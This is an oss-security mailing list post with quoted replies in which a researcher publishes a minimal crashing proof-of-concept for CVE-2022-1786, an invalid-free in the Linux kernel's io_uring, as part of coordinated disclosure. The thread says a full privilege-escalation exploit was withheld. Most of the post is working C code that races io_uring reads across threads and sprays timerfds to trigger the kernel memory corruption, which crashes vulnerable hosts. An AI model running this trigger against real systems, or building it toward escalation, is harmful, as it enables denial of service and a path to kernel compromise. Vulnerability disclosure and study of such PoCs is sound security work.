oss-sec mailing list archives
Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring
From: Kyle Zeng <zengyhkyle () gmail com>
Date: Sat, 28 May 2022 01:26:27 -0700
Hi all, A minimal crashing PoC for CVE-2022-1786 is attached in the email. Kyle =-=-=-=-=-=-=-= #define _GNU_SOURCE #include <stdarg.h> #include <dirent.h> #include <endian.h> #include <errno.h> #include <pthread.h> #include <sched.h> #include <setjmp.h> #include <signal.h> #include <stdarg.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <sys/mount.h> #include <sys/prctl.h> #include <sys/resource.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/time.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #include <assert.h> #include <fcntl.h> #include <linux/fs.h> #include <sys/msg.h> #include <sys/ipc.h> #include <sys/shm.h> #include <sys/timerfd.h> #include <sys/xattr.h> #include <linux/capability.h> #include <linux/futex.h> #include <linux/io_uring.h> // io_uring tutorial: #define u64 unsigned long long #define u32 unsigned int # ifndef __NR_io_uring_setup # define __NR_io_uring_setup 425 # endif # ifndef __NR_io_uring_enter # define __NR_io_uring_enter 426 # endif # ifndef __NR_io_uring_register # define __NR_io_uring_register 427 # endif int fd_io_uring; #define GROOM_NUM 0x20 u64 cpu_num = 4; u64 work_num = 0x200; char fname[] = "/etc/passwd"; u64 heap_addr; int target_shmid; char timerfd_backup[0x100]; #define NAP_TIME1 50000 #define NAP_TIME2 50000 void set_cpu(int cpuid) { cpu_set_t my_set; CPU_ZERO(&my_set); CPU_SET(cpuid, &my_set); assert(sched_setaffinity(0, sizeof(my_set), &my_set) == 0); } void increase_limit() { int ret; struct rlimit open_file_limit; /* Query current soft/hard value */ ret = getrlimit(RLIMIT_NOFILE, &open_file_limit); assert(ret >= 0); printf("[*] file limit: %d\n", open_file_limit.rlim_max); /* Set soft limit to hard limit */ open_file_limit.rlim_cur = open_file_limit.rlim_max; ret = setrlimit(RLIMIT_NOFILE, &open_file_limit); assert(ret >= 0); } struct cq_ring_t { u32 *head; u32 *tail; u32 *ring_mask; u32 *ring_entries; struct io_uring_cqe *cqes; }; struct sq_ring_t { u32 *head; u32 *tail; u32 *ring_mask; u32 *ring_entries; u32 *flags; u32 *array; }; struct uring_mgr_t { int fd; struct sq_ring_t sq_ring; struct cq_ring_t cq_ring; struct io_uring_sqe *sqes; }; #define IORING_OP_WRITE 23 #define IORING_OP_READ 22 struct uring_mgr_t mgr; void uring_mgr_setup(struct uring_mgr_t *mgr, u32 entries) { // create io_uring fd struct io_uring_params setup_params = {0}; setup_params.flags = IORING_SETUP_IOPOLL; mgr->fd = syscall(__NR_io_uring_setup, entries, &setup_params); assert(mgr->fd >= 0); // map the ring buffer and the SQE(submission queue entry) buffer uint32_t sq_ring_sz = setup_params.sq_off.array + setup_params.sq_entries * sizeof(uint32_t); uint32_t cq_ring_sz = setup_params.cq_off.cqes + setup_params.cq_entries * sizeof(struct io_uring_cqe); uint32_t ring_sz = sq_ring_sz > cq_ring_sz ? sq_ring_sz : cq_ring_sz; uint32_t sqes_sz = setup_params.sq_entries * sizeof(struct io_uring_sqe); void *ring_ptr = mmap(NULL, ring_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, mgr->fd, IORING_OFF_SQ_RING); mgr->sqes = (struct io_uring_sqe *) mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, mgr->fd, IORING_OFF_SQES); assert((long)mgr->sqes >= 0); // now initialize the completion queue struct cq_ring_t *cq_ring = &mgr->cq_ring; cq_ring->head = (u32 *)((long )ring_ptr + setup_params.cq_off.head); cq_ring->tail = (u32 *)((long)ring_ptr + setup_params.cq_off.tail); cq_ring->ring_mask = (u32 *)((long)ring_ptr + setup_params.cq_off.ring_mask); cq_ring->ring_entries = (u32 *)((long)ring_ptr + setup_params.cq_off.ring_entries); cq_ring->cqes = (struct io_uring_cqe *)((long)ring_ptr + setup_params.cq_off.cqes); // now initialize the submission queue struct sq_ring_t *sq_ring = &mgr->sq_ring; sq_ring->head = (u32 *)((long)ring_ptr + setup_params.sq_off.head); sq_ring->tail = (u32 *)((long)ring_ptr + setup_params.sq_off.tail); sq_ring->ring_mask = (u32 *)((long)ring_ptr + setup_params.sq_off.ring_mask); sq_ring->ring_entries = (u32 *)((long)ring_ptr + setup_params.sq_off.ring_entries); sq_ring->flags = (u32 *)((long)ring_ptr + setup_params.sq_off.flags); sq_ring->array = (u32 *)((long)ring_ptr + setup_params.sq_off.array); } int *flag; u64 val; u64 *val_ptr = &val; u64 elapse_time[2]; void *func(void *arg) { int cpuid = (int)(long)arg; set_cpu(cpuid); while(*flag == 0); int ret = syscall(__NR_io_uring_enter, fd_io_uring, work_num/2, work_num/2, 1); __atomic_fetch_add(&val, 1, __ATOMIC_SEQ_CST); } void trigger_free() { uring_mgr_setup(&mgr, work_num); fd_io_uring = mgr.fd; printf("fd_io_uring: %d\n", fd_io_uring); // open some file // fd = open("/etc/passwd", O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC); int fds[work_num]; puts(fname); for(int i=0; i<work_num; i++) { fds[i] = open(fname, O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC); assert(fds[i] >= 0); } printf("fd: %d\n", fds[0]); assert(fds[0] >= 0); // SQE: submission queue entries // struct io_uring_sqe sqe = { // .opcode = IORING_OP_WRITE, // .flags = 0, // .ioprio = 0, // .fd = fd, // .off = 0, // .addr = 0, // .len = 1, // }; void *buf = mmap(NULL, 0x5000000, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE, -1, 0); memset(buf, 'A', 0x5000000); struct io_uring_sqe sqe = { .opcode = IORING_OP_READ, .flags = 0, .ioprio = 0, .fd = -1, .off = 0, .addr = (u64)buf, .len = 0x5000000, }; // now submit the request struct sq_ring_t *sq_ring = &mgr.sq_ring; struct cq_ring_t *cq_ring = &mgr.cq_ring; u32 index, tail, next_tail; next_tail = tail = *sq_ring->tail; next_tail++; // barrier(); // copy the request to the sqe buffer index = tail & *mgr.sq_ring.ring_mask; for(int i=0; i<work_num; i++) { sqe.fd = fds[i]; memcpy(&mgr.sqes[index+i], &sqe, sizeof(struct io_uring_sqe)); } sq_ring->array[index] = index; tail = next_tail; assert(*sq_ring->tail != tail); *sq_ring->tail = work_num; set_cpu(2); pthread_t tids[2]; int ret; for(int i=0; i<2; i++) { ret = pthread_create(&tids[i], NULL, func, i); assert(ret == 0); } *flag = 1; // sleep(1); while(*val_ptr != 2); pthread_join(tids[0], NULL); pthread_join(tids[1], NULL); // sleep(1000); execve("/", NULL, NULL); close(fd_io_uring); exit(0); } void attempt() { flag = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANON, -1, 0); if(!fork()) { trigger_free(); } else { wait(NULL); for(int i=0; i<0x100; i++) timerfd_create(CLOCK_REALTIME, 0); } } int main() { puts("========================================================================"); increase_limit(); set_cpu(0); for(int i=0; i<10000; i++) { printf("i: %d\n", i); usleep(10000); if(!fork()) attempt(); else { wait(NULL); } } puts("Done"); } =-=-=-=-=-=-=-= On Tue, May 24, 2022 at 9:28 AM Kyle Zeng <zengyhkyle () gmail com> wrote:
A small correction, I shared a minimal crashing PoC to linux-distros but not the LPE exploit. I do not plan to share the LPE exploit because of ethical issues. To answer your question: I intend to post the crashing PoC on May 27th. Thanks for reminding me. Kyle On Tue, May 24, 2022 at 9:22 AM Solar Designer <solar () openwall com> wrote:On Tue, May 24, 2022 at 09:10:37AM -0700, Kyle Zeng wrote:# Impact I wrote a proof-of-concept exploit and demonstrated that it can be used to achieve local privilege escalation.Since you shared the PoC exploit with linux-distros, you're supposed to also post that to oss-security within 7 days of your first posting above, so by or on May 31. Do you intend to, and when exactly? Alexander
Current thread:
- CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Solar Designer (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 28)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Solar Designer (May 24)